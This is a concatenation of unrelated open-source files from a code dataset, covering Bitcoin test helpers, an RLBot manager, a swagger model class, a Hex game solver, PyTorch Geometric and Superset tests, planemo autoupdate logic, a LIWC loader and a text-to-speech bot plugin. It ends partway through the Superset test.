coinbaseoutput.nValue = 50 * COIN
halvings = int(height / 150) # regtest
coinbaseoutput.nValue >>= halvings
if (pubkey is not None):
coinbaseoutput.scriptPubKey = CScript([pubkey, OP_CHECKSIG])
else:
coinbaseoutput.scriptPubKey = CScript([OP_TRUE])
coinbase.vout = [coinbaseoutput]
coinbase.calc_sha256()
return coinbase
def create_tx_with_script(prevtx, n, script_sig=b"", *, amount, script_pub_key=CScript()):
"""Return one-input, one-output transaction object
spending the prevtx's n-th output with the given amount.
Can optionally pass scriptPubKey and scriptSig, default is anyone-can-spend ouput.
"""
tx = CTransaction()
assert(n < len(prevtx.vout))
tx.vin.append(CTxIn(COutPoint(prevtx.sha256, n), script_sig, 0xffffffff))
tx.vout.append(CTxOut(amount, script_pub_key))
tx.calc_sha256()
return tx
def create_transaction(node, txid, to_address, *, amount):
""" Return signed transaction spending the first output of the
input txid. Note that the node must be able to sign for the
output that is being spent, and the node must not be running
multiple wallets.
"""
raw_tx = create_raw_transaction(node, txid, to_address, amount=amount)
tx = CTransaction()
tx.deserialize(BytesIO(hex_str_to_bytes(raw_tx)))
return tx
def create_raw_transaction(node, txid, to_address, *, amount):
""" Return raw signed transaction spending the first output of the
input txid. Note that the node must be able to sign for the
output that is being spent, and the node must not be running
multiple wallets.
"""
rawtx = node.createrawtransaction(inputs=[{"txid": txid, "vout": 0}], outputs={to_address: amount})
signresult = node.signrawtransactionwithwallet(rawtx)
assert_equal(signresult["complete"], True)
return signresult['hex']
def get_legacy_sigopcount_block(block, accurate=True):
count = 0
for tx in block.vtx:
count += get_legacy_sigopcount_tx(tx, accurate)
return count
def get_legacy_sigopcount_tx(tx, accurate=True):
count = 0
for i in tx.vout:
count += i.scriptPubKey.GetSigOpCount(accurate)
for j in tx.vin:
# scriptSig might be of type bytes, so convert to CScript for the moment
count += CScript(j.scriptSig).GetSigOpCount(accurate)
return count
def witness_script(use_p2wsh, pubkey):
"""Create a scriptPubKey for a pay-to-wtiness TxOut.
This is either a P2WPKH output for the given pubkey, or a P2WSH output of a
1-of-1 multisig for the given pubkey. Returns the hex encoding of the
scriptPubKey."""
if not use_p2wsh:
# P2WPKH instead
pubkeyhash = hash160(hex_str_to_bytes(pubkey))
pkscript = CScript([OP_0, pubkeyhash])
else:
# 1-of-1 multisig
witness_program = CScript([OP_1, hex_str_to_bytes(pubkey), OP_1, OP_CHECKMULTISIG])
scripthash = sha256(witness_program)
pkscript = CScript([OP_0, scripthash])
return bytes_to_hex_str(pkscript)
def create_witness_tx(node, use_p2wsh, utxo, pubkey, encode_p2sh, amount):
"""Return a transaction (in hex) that spends the given utxo to a segwit output.
Optionally wrap the segwit output using P2SH."""
if use_p2wsh:
program = CScript([OP_1, hex_str_to_bytes(pubkey), OP_1, OP_CHECKMULTISIG])
addr = script_to_p2sh_p2wsh(program) if encode_p2sh else script_to_p2wsh(program)
else:
addr = key_to_p2sh_p2wpkh(pubkey) if encode_p2sh else key_to_p2wpkh(pubkey)
if not encode_p2sh:
assert_equal(node.getaddressinfo(addr)['scriptPubKey'], witness_script(use_p2wsh, pubkey))
return node.createrawtransaction([utxo], {addr: amount})
def send_to_witness(use_p2wsh, node, utxo, pubkey, encode_p2sh, amount, sign=True, insert_redeem_script=""):
"""Create a transaction spending a given utxo to a segwit output.
The output corresponds to the given pubkey: use_p2wsh determines whether to
use P2WPKH or P2WSH; encode_p2sh determines whether to wrap in P2SH.
sign=True will have the given node sign the transaction.
insert_redeem_script will be added to the scriptSig, if given."""
tx_to_witness = create_witness_tx(node, use_p2wsh, utxo, pubkey, encode_p2sh, amount)
if (sign):
signed = node.signrawtransactionwithwallet(tx_to_witness)
assert("errors" not in signed or len(["errors"]) == 0)
return node.sendrawtransaction(signed["hex"])
else:
if (insert_redeem_script):
tx = FromHex(CTransaction(), tx_to_witness)
tx.vin[0].scriptSig += CScript([hex_str_to_bytes(insert_redeem_script)])
tx_to_witness = ToHex(tx)
return node.sendrawtransaction(tx_to_witness)
|
the-stack_106_23768 | import multiprocessing as mp
import os
import time
import traceback
from datetime import datetime, timedelta
from rlbot.botmanager.agent_metadata import AgentMetadata
from rlbot.utils import rate_limiter
from rlbot.utils.logging_utils import get_logger
from rlbot.utils.structures.game_interface import GameInterface
from rlbot.utils.structures.quick_chats import register_for_quick_chat, send_quick_chat_flat
GAME_TICK_PACKET_REFRESHES_PER_SECOND = 120 # 2*60. https://en.wikipedia.org/wiki/Nyquist_rate
MAX_CHAT_RATE = 2.0
MAX_CHAT_COUNT = 5
MAX_AGENT_CALL_PERIOD = timedelta(seconds=1.0 / 30) # Minimum call rate when paused.
REFRESH_IN_PROGRESS = 1
REFRESH_NOT_IN_PROGRESS = 0
MAX_CARS = 10
class BotManager:
def __init__(self, terminate_request_event, termination_complete_event, reload_request_event, bot_configuration,
name, team, index, agent_class_wrapper, agent_metadata_queue, quick_chat_queue_holder):
"""
:param terminate_request_event: an Event (multiprocessing) which will be set from the outside when the program is trying to terminate
:param termination_complete_event: an Event (multiprocessing) which should be set from inside this class when termination has completed successfully
:param reload_request_event: an Event (multiprocessing) which will be set from the outside to force a reload of the agent
:param reload_complete_event: an Event (multiprocessing) which should be set from inside this class when reloading has completed successfully
:param bot_configuration: parameters which will be passed to the bot's constructor
:param name: name which will be passed to the bot's constructor. Will probably be displayed in-game.
:param team: 0 for blue team or 1 for orange team. Will be passed to the bot's constructor.
:param index: The player index, i.e. "this is player number <index>". Will be passed to the bot's constructor.
Can be used to pull the correct data corresponding to the bot's car out of the game tick packet.
:param agent_class_wrapper: The ExternalClassWrapper object that can be used to load and reload the bot
:param agent_metadata_queue: a Queue (multiprocessing) which expects to receive certain metadata about the agent once available.
:param quick_chat_queue_holder: A data structure which helps the bot send and receive quickchat
"""
self.terminate_request_event = terminate_request_event
self.termination_complete_event = termination_complete_event
self.reload_request_event = reload_request_event
self.bot_configuration = bot_configuration
self.name = name
self.team = team
self.index = index
self.agent_class_wrapper = agent_class_wrapper
self.agent_metadata_queue = agent_metadata_queue
self.logger = get_logger('bot' + str(self.index))
self.game_interface = GameInterface(self.logger)
self.quick_chat_queue_holder = quick_chat_queue_holder
self.last_chat_time = time.time()
self.chat_counter = 0
self.reset_chat_time = True
self.game_tick_packet = None
self.bot_input = None
def send_quick_chat_from_agent(self, team_only, quick_chat):
"""
Passes the agents quick chats to the other bots.
This does perform limiting.
You are limited to 5 quick chats in a 2 second period starting from the first chat.
This means you can spread your chats out to be even within that 2 second period.
You could spam them in the first little bit but then will be throttled.
"""
time_since_last_chat = time.time() - self.last_chat_time
if not self.reset_chat_time and time_since_last_chat >= MAX_CHAT_RATE:
self.reset_chat_time = True
if self.reset_chat_time:
self.last_chat_time = time.time()
self.chat_counter = 0
self.reset_chat_time = False
if self.chat_counter < MAX_CHAT_COUNT:
send_quick_chat_flat(self.game_interface, self.index, self.team, team_only, quick_chat)
#send_quick_chat(self.quick_chat_queue_holder, self.index, self.team, team_only, quick_chat)
self.chat_counter += 1
else:
self.logger.debug('quick chat disabled for %s', MAX_CHAT_RATE - time_since_last_chat)
def load_agent(self):
"""
Loads and initializes an agent using instance variables, registers for quick chat and sets render functions.
:return: An instance of an agent, and the agent class file.
"""
agent_class = self.agent_class_wrapper.get_loaded_class()
agent = agent_class(self.name, self.team, self.index)
agent.logger = self.logger
agent.load_config(self.bot_configuration.get_header("Bot Parameters"))
self.update_metadata_queue(agent)
self.set_render_manager(agent)
agent_class_file = self.agent_class_wrapper.python_file
agent._register_quick_chat(self.send_quick_chat_from_agent)
agent._register_field_info(self.get_field_info)
agent._register_set_game_state(self.set_game_state)
agent._register_ball_prediction(self.get_ball_prediction)
register_for_quick_chat(self.quick_chat_queue_holder, agent.handle_quick_chat, self.terminate_request_event)
# Once all engine setup is done, do the agent-specific initialization, if any:
agent.initialize_agent()
return agent, agent_class_file
def set_render_manager(self, agent):
"""
Sets the render manager for the agent.
:param agent: An instance of an agent.
"""
rendering_manager = self.game_interface.renderer.get_rendering_manager(self.index, self.team)
agent._set_renderer(rendering_manager)
def update_metadata_queue(self, agent):
"""
Adds a new instance of AgentMetadata into the `agent_metadata_queue` using `agent` data.
:param agent: An instance of an agent.
"""
pids = {os.getpid(), *agent.get_extra_pids()}
helper_process_request = agent.get_helper_process_request()
self.agent_metadata_queue.put(AgentMetadata(self.index, self.name, self.team, pids, helper_process_request))
def reload_agent(self, agent, agent_class_file):
"""
Reloads the agent. Can throw exceptions. External classes should use reload_event.set() instead.
:param agent: An instance of an agent.
:param agent_class_file: The agent's class file.
:return: The reloaded instance of the agent, and the agent class file.
"""
self.logger.info('Reloading Agent: ' + agent_class_file)
self.agent_class_wrapper.reload()
old_agent = agent
agent, agent_class_file = self.load_agent()
# Retire after the replacement initialized properly.
if hasattr(old_agent, 'retire'):
old_agent.retire()
return agent, agent_class_file
def run(self):
"""
Loads interface for RLBot, prepares environment and agent, and calls the update for the agent.
"""
self.logger.debug('initializing agent')
self.game_interface.load_interface()
self.prepare_for_run()
# Create Ratelimiter
rate_limit = rate_limiter.RateLimiter(GAME_TICK_PACKET_REFRESHES_PER_SECOND)
last_tick_game_time = None # What the tick time of the last observed tick was
last_call_real_time = datetime.now() # When we last called the Agent
# Get bot module
agent, agent_class_file = self.load_agent()
last_module_modification_time = os.stat(agent_class_file).st_mtime
# Run until main process tells to stop
while not self.terminate_request_event.is_set():
before = datetime.now()
self.pull_data_from_game()
# game_tick_packet = self.game_interface.get
# Read from game data shared memory
# Run the Agent only if the game_info has updated.
tick_game_time = self.get_game_time()
should_call_while_paused = datetime.now() - last_call_real_time >= MAX_AGENT_CALL_PERIOD
if tick_game_time != last_tick_game_time or should_call_while_paused:
last_tick_game_time = tick_game_time
last_call_real_time = datetime.now()
# Reload the Agent if it has been modified or if reload is requested from outside.
try:
new_module_modification_time = os.stat(agent_class_file).st_mtime
if new_module_modification_time != last_module_modification_time or self.reload_request_event.is_set():
self.reload_request_event.clear()
last_module_modification_time = new_module_modification_time
agent, agent_class_file = self.reload_agent(agent, agent_class_file)
except FileNotFoundError:
self.logger.error("Agent file {} was not found. Will try again.".format(agent_class_file))
time.sleep(0.5)
except Exception:
self.logger.error("Reloading the agent failed:\n" + traceback.format_exc())
time.sleep(0.5) # Avoid burning CPU / logs if this starts happening constantly
# Call agent
try:
self.call_agent(agent, self.agent_class_wrapper.get_loaded_class())
except Exception as e:
self.logger.error("Call to agent failed:\n" + traceback.format_exc())
# Ratelimit here
after = datetime.now()
rate_limit.acquire(after - before)
if hasattr(agent, 'retire'):
agent.retire()
# If terminated, send callback
self.termination_complete_event.set()
def get_field_info(self):
return self.game_interface.get_field_info()
def set_game_state(self, game_state):
return self.game_interface.set_game_state(game_state)
def get_ball_prediction(self):
return self.game_interface.get_ball_prediction()
def prepare_for_run(self):
raise NotImplementedError
def call_agent(self, agent, agent_class):
raise NotImplementedError
def get_game_time(self):
raise NotImplementedError
def pull_data_from_game(self):
raise NotImplementedError
|
the-stack_106_23769 | # coding: utf-8
# -----------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="Link.py">
# Copyright (c) 2003-2021 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# -----------------------------------------------------------------------------------
import pprint
import re # noqa: F401
import six
class Link(object):
"""
Provides information for the object link This is supposed to be an atom:link, therefore it should have all attributes specified here http://tools.ietf.org/html/rfc4287#section-4.2.7
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'href': 'str',
'rel': 'str',
'type': 'str',
'title': 'str'
}
attribute_map = {
'href': 'Href',
'rel': 'Rel',
'type': 'Type',
'title': 'Title'
}
def __init__(self, href=None, rel=None, type=None, title=None, **kwargs): # noqa: E501
"""Initializes new instance of Link""" # noqa: E501
self._href = None
self._rel = None
self._type = None
self._title = None
if href is not None:
self.href = href
if rel is not None:
self.rel = rel
if type is not None:
self.type = type
if title is not None:
self.title = title
@property
def href(self):
"""
Gets the href. # noqa: E501
The \"href\" attribute contains the link's IRI. atom:link elements MUST have an href attribute, whose value MUST be a IRI reference # noqa: E501
:return: The href. # noqa: E501
:rtype: str
"""
return self._href
@href.setter
def href(self, href):
"""
Sets the href.
The \"href\" attribute contains the link's IRI. atom:link elements MUST have an href attribute, whose value MUST be a IRI reference # noqa: E501
:param href: The href. # noqa: E501
:type: str
"""
self._href = href
@property
def rel(self):
"""
Gets the rel. # noqa: E501
atom:link elements MAY have a \"rel\" attribute that indicates the link relation type. If the \"rel\" attribute is not present, the link element MUST be interpreted as if the link relation type is \"alternate\" # noqa: E501
:return: The rel. # noqa: E501
:rtype: str
"""
return self._rel
@rel.setter
def rel(self, rel):
"""
Sets the rel.
atom:link elements MAY have a \"rel\" attribute that indicates the link relation type. If the \"rel\" attribute is not present, the link element MUST be interpreted as if the link relation type is \"alternate\" # noqa: E501
:param rel: The rel. # noqa: E501
:type: str
"""
self._rel = rel
@property
def type(self):
"""
Gets the type. # noqa: E501
On the link element, the \"type\" attribute's value is an advisory media type: it is a hint about the type of the representation that is expected to be returned when the value of the href attribute is dereferenced. Note that the type attribute does not override the actual media type returned with the representation # noqa: E501
:return: The type. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""
Sets the type.
On the link element, the \"type\" attribute's value is an advisory media type: it is a hint about the type of the representation that is expected to be returned when the value of the href attribute is dereferenced. Note that the type attribute does not override the actual media type returned with the representation # noqa: E501
:param type: The type. # noqa: E501
:type: str
"""
self._type = type
@property
def title(self):
"""
Gets the title. # noqa: E501
The \"title\" attribute conveys human-readable information about the link. The content of the \"title\" attribute is Language-Sensitive # noqa: E501
:return: The title. # noqa: E501
:rtype: str
"""
return self._title
@title.setter
def title(self, title):
"""
Sets the title.
The \"title\" attribute conveys human-readable information about the link. The content of the \"title\" attribute is Language-Sensitive # noqa: E501
:param title: The title. # noqa: E501
:type: str
"""
self._title = title
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Link):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
the-stack_106_23770 | class ConnectGame:
def __init__(self, board):
self.board = [row.replace(" ", "") for row in board.splitlines()]
def get_winner(self):
if self.is_winner("O"):
return "O"
elif self.is_winner("X"):
return "X"
else:
return ""
def is_winner(self, player):
board = self.board if player == "O" else [
[self.board[r][c] for r in range(len(self.board))]
for c in range(len(self.board[0]))]
positions = [(0, c) for c, s in enumerate(board[0]) if s == player]
checked = set(positions)
while positions != []:
r, c = positions.pop()
if r == len(board) - 1:
return True
for i, j in [(-1, 1), (-1, 0), (0, -1), (0, 1), (1, -1), (1, 0)]:
r_ = r + i
c_ = c + j
if 0 <= r_ < len(board) and 0 <= c_ < len(board[0]) \
and board[r_][c_] == player and (r_, c_) not in checked:
positions.append((r_, c_))
checked.add((r_, c_))
return False
|
the-stack_106_23772 | import torch
from torch.nn import Sequential as Seq, Linear as Lin, ReLU
from torch_geometric.nn import PPFConv
def test_point_conv():
in_channels, out_channels = (16, 32)
edge_index = torch.tensor([[0, 0, 0, 1, 2, 3], [1, 2, 3, 0, 0, 0]])
num_nodes = edge_index.max().item() + 1
x = torch.randn((num_nodes, in_channels))
pos = torch.rand((num_nodes, 3))
norm = torch.nn.functional.normalize(torch.rand((num_nodes, 3)), dim=1)
local_nn = Seq(Lin(in_channels + 4, 32), ReLU(), Lin(32, out_channels))
global_nn = Seq(Lin(out_channels, out_channels))
conv = PPFConv(local_nn, global_nn)
assert conv.__repr__() == (
'PPFConv(local_nn=Sequential(\n'
' (0): Linear(in_features=20, out_features=32, bias=True)\n'
' (1): ReLU()\n'
' (2): Linear(in_features=32, out_features=32, bias=True)\n'
'), global_nn=Sequential(\n'
' (0): Linear(in_features=32, out_features=32, bias=True)\n'
'))')
out = conv(x, pos, norm, edge_index)
assert out.size() == (num_nodes, out_channels)
jit_conv = conv.jittable(x=x, pos=pos, norm=norm, edge_index=edge_index)
jit_conv = torch.jit.script(jit_conv)
assert jit_conv(x, pos, norm, edge_index).tolist() == out.tolist()
|
the-stack_106_23774 | import numpy as np
import matplotlib.pyplot as plt
# Compute the x and y coordinates for points on sine and cosine curves
x = np.arange(0, 3 * np.pi, 0.1)
y_sin = np.sin(x)
y_cos = np.cos(x)
# Set up a subplot grid that has height 2 and width 1,
# and set the first such subplot as active.
plt.subplot(3,1,1)
# Make the first plot
plt.plot(x, y_sin)
plt.title('Sine')
# Set the second subplot as active, and make the second plot.
plt.subplot(312)
plt.plot(x, y_cos)
plt.title('Cosine')
plt.subplot(313)
plt.plot(x, y_cos)
plt.title('Cosine2')
# Show the figure.
plt.show()
|
the-stack_106_23775 | """Autoupdate older conda dependencies in the requirements section."""
from __future__ import absolute_import
import collections
import re
import xml.etree.ElementTree as ET
from galaxy.tool_util.deps import conda_util
import planemo.conda
from planemo.io import error, info
def find_macros(xml_tree):
"""
Get macros from the XML tree
"""
macros = []
for macro_import in xml_tree.iter("import"):
macros.append(macro_import.text)
return macros
def get_requirements(xml_tree):
"""
Get requirements from the XML tree
"""
requirements = {}
main_req = None
for requirement in xml_tree.iter("requirement"):
if requirement.attrib.get('version') == '@TOOL_VERSION@':
main_req = requirement.text
else:
requirements[requirement.text] = {'tag': ET.tostring(requirement, encoding="unicode").strip(), 'text': requirement.attrib.get('version')}
return requirements, main_req
def get_tokens(xml_tree):
"""
Get tokens from the XML tree
"""
tokens = {}
for token in xml_tree.iter("token"):
tokens[token.attrib['name']] = {'tag': ET.tostring(token, encoding="unicode").strip(), 'text': token.text}
return tokens
def check_conda(tool_name, ctx, **kwds):
"""
Get the most up-to-date conda version for a tool requirement
"""
conda_context = planemo.conda.build_conda_context(ctx, **kwds)
if not conda_context.is_conda_installed():
error("Conda is not installed! Try running planemo conda_init.")
target = planemo.conda.conda_util.CondaTarget(tool_name)
search_results = conda_util.best_search_result(target, conda_context=conda_context)
return search_results[0]['version']
def update_xml(tool_path, xml_tree, tags_to_update, wrapper_version_token, is_macro=False):
"""
Write modified XML to tool_path
"""
def update_token(xml_text, tag, token_value):
new_tag = '>{}<'.format(token_value).join(re.split('>.*<', tag))
return re.sub(tag, new_tag, xml_text)
def update_requirement(xml_text, tag, requirement_value):
new_tag = 'version="{}"'.format(requirement_value).join(re.split('version=".*"', tag))
return re.sub(tag, new_tag, xml_text)
with open(tool_path, 'r+', newline='') as f:
xml_text = f.read()
for tag_to_update in tags_to_update:
if tag_to_update['type'] == 'token':
xml_text = update_token(xml_text, tag_to_update['tag'], tag_to_update['value'])
if tag_to_update['type'] == 'requirement':
xml_text = update_requirement(xml_text, tag_to_update['tag'], tag_to_update['value'])
if wrapper_version_token == 0 and not is_macro:
# i.e. @VERSION_SUFFIX@ not specified so update the version directly in the tool tag
tool_tag = re.sub('version="@TOOL_VERSION@.*?"', 'version="@TOOL_VERSION@+galaxy0"',
re.findall('<tool .*version="@TOOL_VERSION@.*">', xml_text)[0])
xml_text = re.sub('<tool .*version="@TOOL_VERSION@.*">', tool_tag, xml_text)
f.seek(0)
f.truncate()
f.write(xml_text)
def create_requirement_dict(xml_files, skip_reqs):
"""
Create dict with requirements and find main requirement
"""
requirements = {}
main_req = None
for k, v in xml_files.items():
file_reqs, file_main_req = get_requirements(v)
requirements[k] = {k: v for k, v in file_reqs.items() if k not in skip_reqs}
if file_main_req:
if main_req:
error('Multiple requirements use the token @TOOL_VERSION@!')
main_req = (file_main_req, k)
if not main_req:
error('No requirement uses the token @TOOL_VERSION@!')
return requirements, main_req
def create_token_dict(ctx, xml_files, main_req, **kwds):
"""
Create dict with relevant tokens and check conda requirements for main
"""
tokens = {}
current_main_req, updated_main_req = None, None
xml_to_update = collections.defaultdict(list)
for k, v in xml_files.items():
tokens[k] = get_tokens(v)
# check if it is @TOOL_VERSION@ and if so do check_conda
if '@TOOL_VERSION@' in tokens[k]:
current_main_req = tokens[k]['@TOOL_VERSION@']['text']
updated_main_req = check_conda(main_req[0], ctx, **kwds)
if current_main_req:
xml_to_update[k].append({'type': 'token', 'tag': tokens[k]['@TOOL_VERSION@']['tag'], 'value': updated_main_req})
return tokens, xml_to_update, current_main_req, updated_main_req
def perform_required_update(ctx, xml_files, tool_path, requirements, tokens, xml_to_update, wrapper_version_token, **kwds):
"""
Carry out the update, if requirements are out-of-date
"""
# check all requirements
for k, v in requirements.items():
for req in v:
req_check = check_conda(req, ctx, **kwds)
# print(req_check, v[req]['text'])
if req_check != v[req]['text']:
xml_to_update[k].append({'type': 'requirement', 'tag': v[req]['tag'], 'value': req_check})
# check all tokens, if wrapper_version_token exists
if wrapper_version_token:
for k, v in tokens.items():
if wrapper_version_token in v:
xml_to_update[k].append({'type': 'token', 'tag': v[wrapper_version_token]['tag'], 'value': 0})
# finally, update each file separately
for k, v in xml_files.items():
update_xml(k, v, xml_to_update[k], wrapper_version_token, is_macro=(k != tool_path))
info("Tool {} updated.".format(tool_path))
return set(xml_files)
def autoupdate_tool(ctx, tool_path, modified_files=set(), **kwds):
"""
Autoupdate an XML file
"""
# create a dict of all files that need editing - wrapper plus macros
xml_files = {tool_path: ET.parse(tool_path)}
# get name of token which defines the wrapper version; if just an integer, None
versions = xml_files[tool_path].getroot().attrib.get('version')
if versions:
versions = versions.split('+galaxy')
if versions[0] != '@TOOL_VERSION@':
error('Tool version does not contain @TOOL_VERSION@ as required by autoupdate.')
return
elif len(versions) == 1:
wrapper_version_token = None
else:
if versions[1][0] == versions[1][-1] == '@':
wrapper_version_token = versions[1]
else:
wrapper_version_token = 0 # assume an int
else:
wrapper_version_token = None
# add macros to xml_files
for macro in find_macros(xml_files[tool_path]):
macro_path = '/'.join(tool_path.split('/')[:-1] + [macro])
xml_files[macro_path] = ET.parse(macro_path)
requirements, main_req = create_requirement_dict(xml_files, kwds.get('skip_requirements', '').split(','))
tokens, xml_to_update, current_main_req, updated_main_req = create_token_dict(ctx, xml_files, main_req, **kwds)
if current_main_req == updated_main_req and not (modified_files & set(xml_files)):
info("No updates required or made to {}.".format(tool_path))
return # end here if no update needed
if kwds.get('dry_run'):
error("Update required to {}! Tool main requirement has version {}, newest conda version is {}".format(
tool_path, current_main_req, updated_main_req))
return
else:
return perform_required_update(ctx, xml_files, tool_path, requirements, tokens, xml_to_update, wrapper_version_token, **kwds)
def _update_wf(config, workflow_id):
"""
Recursively update a workflow, including subworkflows
"""
wf = config.user_gi.workflows.show_workflow(workflow_id)
for step in wf['steps'].values():
if step['type'] == 'subworkflow':
# update subworkflows before the main workflow
_update_wf(config, step['workflow_id'])
config.user_gi.workflows.refactor_workflow(workflow_id, actions=[{"action_type": "upgrade_all_steps"}])
def autoupdate_wf(ctx, config, wf):
workflow_id = config.workflow_id_for_runnable(wf)
_update_wf(config, workflow_id)
return config.user_gi.workflows.export_workflow_dict(workflow_id)
|
the-stack_106_23776 | import os
#from sys_config import BASE_DIR
import matplotlib.pyplot as plt
import seaborn as sns
BASE_DIR = '../data/'
# LIWC Lexicon http://lit.eecs.umich.edu/~geoliwc/LIWC_Dictionary.htm
def load_liwc_lexicon(file):
# returns LIWC in the form of a dictionary
# keys: words, values: feature vector (list)
_data = {}
lines = open(file, "r", encoding="utf-8").readlines()
for line_id, line in enumerate(lines):
_row = line.rstrip().split(" ")
_word = _row[0]
_features = _row[1:]
_data[_word] = _features
return _data
def load_features(file):
dim2num = {} # [dimension name]: corresponding number in lexicon list
num2dim = {} # the exact opposite
lines = open(file, "r", encoding="utf-8").readlines()
for line_id, line in enumerate(lines):
_row = line.rstrip().split(" ")
_dim = _row[1]
dim2num[_dim] = line_id
num2dim[line_id] = _dim
return dim2num, num2dim
####################################################
# Load LIWC Lexicon
####################################################
def liwc_lex():
# get the liwc lexicon in the form of a dictionary
# where keys are the unique words
# and values a list with all the dimensions (73 in total)
lex = load_liwc_lexicon(
os.path.join(BASE_DIR, 'PsycholinguisticLexicon.txt'))
total_words = len(lex)
# get the two dictionaries that relate every dimension name
# with its corresponding number (value) in the lexicon dimension list
dim2num, num2dim = load_features(
os.path.join(BASE_DIR, 'PsycholinguisticDimensions.txt'))
####################################################
# Plot statistics of LIWC Lexicon
####################################################
# The lexiconss has 18504 words and for each word a feature vector of size 71.
# Each dimension represents a category (for example affect, posemo, negemo etc)
# The vector contains '1' when this word is includied in the particular category.
# Otherwise '0'.
# Using a bar plot we can decide which dimensions of this feature vector are useful for our work.
# initialization of count dictionary
dimensions = list(dim2num.keys())
dim_counts = {dim: 0 for dim in dimensions}
for word in lex:
ones = [i for i, x in enumerate(lex[word]) if x == '1']
for index in ones:
dim_counts[num2dim[index]] += 1
sorted_tuples = sorted(dim_counts.items(), key=lambda kv: kv[1])
x = [k[1] for k in sorted_tuples if k[1] > 500]
y = [k[0] for k in sorted_tuples if k[1] > 500]
plt.figure()
sns.barplot(x=x, y=y)
plt.title('Number of words for each dimension of the LIWC lexicon')
# plt.show()
plt.savefig('liwc_dims_statistics.png')
# plt.close()
print(len(lex))
def load_liwc_lex():
return load_liwc_lexicon(
os.path.join(BASE_DIR, 'PsycholinguisticLexicon.txt'))
# liwc_lex()
|
the-stack_106_23779 | """ Google Text to Speech
Available Commands:
.tts LanguageCode as reply to a message
.tts LangaugeCode | text to speak"""
import asyncio
import os
import subprocess
from datetime import datetime
from gtts import gTTS
from uniborg.util import admin_cmd
@borg.on(admin_cmd("tts (.*)"))
async def _(event):
if event.fwd_from:
return
input_str = event.pattern_match.group(1)
start = datetime.now()
if event.reply_to_msg_id:
previous_message = await event.get_reply_message()
text = previous_message.message
lan = input_str
elif "|" in input_str:
lan, text = input_str.split("|")
else:
await event.edit("Invalid Syntax. Module stopping.")
return
text = text.strip()
lan = lan.strip()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
required_file_name = Config.TMP_DOWNLOAD_DIRECTORY + "voice.ogg"
try:
#https://github.com/SpEcHiDe/UniBorg/commit/17f8682d5d2df7f3921f50271b5b6722c80f4106
tts = gTTS(text, lang=lan)
tts.save(required_file_name)
command_to_execute = [
"ffmpeg",
"-i",
required_file_name,
"-map",
"0:a",
"-codec:a",
"libopus",
"-b:a",
"100k",
"-vbr",
"on",
required_file_name + ".opus"
]
try:
t_response = subprocess.check_output(command_to_execute, stderr=subprocess.STDOUT)
except (subprocess.CalledProcessError, NameError, FileNotFoundError) as exc:
await event.edit(str(exc))
# continue sending required_file_name
else:
os.remove(required_file_name)
required_file_name = required_file_name + ".opus"
end = datetime.now()
ms = (end - start).seconds
await borg.send_file(
event.chat_id,
required_file_name,
# caption="Processed {} ({}) in {} seconds!".format(text[0:97], lan, ms),
reply_to=event.message.reply_to_msg_id,
allow_cache=False,
voice_note=True
)
os.remove(required_file_name)
await event.edit("Processed {} ({}) in {} seconds!".format(text[0:97], lan, ms))
await asyncio.sleep(5)
await event.delete()
except Exception as e:
await event.edit(str(e))
|
the-stack_106_23782 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
from typing import Optional
from unittest import mock
from superset.extensions import async_query_manager
from tests.base_tests import SupersetTestCase
from tests.test_app import app
class TestAsyncEventApi(SupersetTestCase):
UUID = "943c920-32a5-412a-977d-b8e47d36f5a4"
def fetch_events(self, last_id: Optional[str] = None):
base_uri = "api/v1/async_event/"
uri = f"{base_uri}?last_id={last_id}" if last_id else base_uri
return self.client.get(uri)
@mock.patch("uuid.uuid4", return_value=UUID)
def test_events(self, mock_uuid4):
async_query_manager.init_app(app)
self.login(username="admin")
with mock.patch.object(async_query_manager._redis, "xrange") as mock_xrange:
rv = self.fetch_events()
